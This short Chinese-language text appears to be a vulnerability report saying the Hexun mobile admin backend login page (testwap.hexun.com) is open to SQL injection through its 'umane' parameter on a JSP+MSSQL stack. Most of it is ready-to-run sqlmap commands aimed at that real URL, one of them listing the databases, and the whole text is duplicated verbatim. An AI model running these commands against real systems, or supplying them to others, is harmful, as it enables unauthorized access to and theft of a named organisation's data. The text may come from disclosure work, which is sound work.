http://testwap.hexun.com/admin/index.jsp
和讯手机管理后台
存在注入
url:
umane存在注入
sqlmap -u "http://testwap.hexun.com/admin/login.jsp?umane=test&pwd=test"
JSP+MSSQL
sqlmap -u "http://testwap.hexun.com/admin/login.jsp?umane=test&pwd=test" --dbs
http://testwap.hexun.com/admin/index.jsp
和讯手机管理后台
存在注入
url:
umane存在注入
sqlmap -u "http://testwap.hexun.com/admin/login.jsp?umane=test&pwd=test"
JSP+MSSQL
sqlmap -u "http://testwap.hexun.com/admin/login.jsp?umane=test&pwd=test" --dbs